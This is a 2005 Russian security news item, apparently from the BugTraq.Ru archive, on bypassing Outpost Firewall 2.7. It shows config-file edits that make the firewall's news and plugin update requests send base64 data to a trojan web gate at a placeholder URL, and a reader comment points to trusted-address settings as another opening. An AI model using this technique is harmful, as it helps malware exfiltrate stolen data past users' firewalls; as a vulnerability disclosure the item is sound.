информационная безопасность
без паники и всерьез
 подробно о проекте 		Rambler's Top100Где водятся OGRыВсе любят медПортрет посетителя
BugTraq.Ru
 Русский BugTraq
 Знакомьтесь: проект Namecoin, будущий... 
 Основы защиты данных от разрушения.... 
 Секреты DPAPI 
 Уязвимость камер TRENDnet открыла... 
 Взломщики опубликовали код pcAnywhere 
 Интеграционное 
главная книги soft обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / RSN / архив / 2005 / сентябрь
2005
главная
январь
февраль
март
апрель
май
июнь
июль
август
сентябрь
октябрь
ноябрь
декабрь
предложить новость

Add to Google



BugTraq.Ru at FaceBook

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: http://bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH    
предложить новость  |  обсудить  |  все отзывы (1) [7834]
назад «  » вперед

последние новости
Уязвимость камер TRENDnet открыла свободный доступ к домашнему видео // 08.02.12 00:36
Взломщики опубликовали код pcAnywhere // 07.02.12 21:37
Интеграционное // 07.02.12 17:27
Adobe добавит песочницу в Flash для Firefox // 07.02.12 14:44
Google все-таки стал проверять приложения из Маркета // 03.02.12 19:50
Symantec обнаружила полиморфного андроидного трояна из России // 03.02.12 19:36
8 марта у жертв DNSChanger закончится интернет // 03.02.12 12:01

Комментарии:

Ты лучше повнимательней приглядись к файлу... 14.09.05 08:17  
Автор: shaelf Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Ты лучше повнимательней приглядись к файлу "конфигурация1.ini", вот там есть где погулять:) (деверенные адреса, доверенные порты и т.д.)
<добавить комментарий>
анонимность клоуны конференции спам уязвимости .net acrobat activex adobe android apple beta blaster borland botnet chrome cisco ctf ddos dmca dnet dns dos eclipse eeye elcomsoft excel facebook firefox flash freebsd gnome google gpl ibm icq ie ios iphone java l0pht leak linux livejournal mac mcafee microsoft mozilla netware novell open source opera oracle os/2 outlook patch php powerpoint quicktime rc5 redhat retro rip rsa safari sco secunia server service pack shopping skype solaris sony spyware stuff sun symantec torrents unix virus vista vmware vpn wikipedia windows word xp xss yahoo


Rambler's Top100
Рейтинг@Mail.ru

Content.Mail.Ru

  Copyright © 2001-2012 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach